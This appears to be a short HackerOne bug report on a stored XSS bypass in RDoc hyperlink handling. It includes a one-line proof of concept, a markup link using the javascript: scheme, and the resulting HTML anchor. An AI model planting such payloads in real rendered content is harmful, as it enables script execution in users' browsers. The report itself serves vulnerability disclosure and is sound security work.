Stored XSS in RDoc hyperlinks through javascript scheme
Medium
Vulnerability Details
Hello,
I found that it is possible to bypass the XSS filtering made in a series of patches to solve #1187156 report. The #1187156 wasn't sent by me, I found the 'hyperlinks' fixes from investigating the git log.
PoC
----
Create the file with the following link:
```
x[javascript:alert(1)]
```
The output html file will contain:
```html
<a href="javascript:alert(1)">x</a>
```
## Impact
A cross-site scripting (XSS) vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
Actions
View on HackerOneReport Stats
- Report ID: 1977258
- State: Closed
- Substate: informative
- Upvotes: 4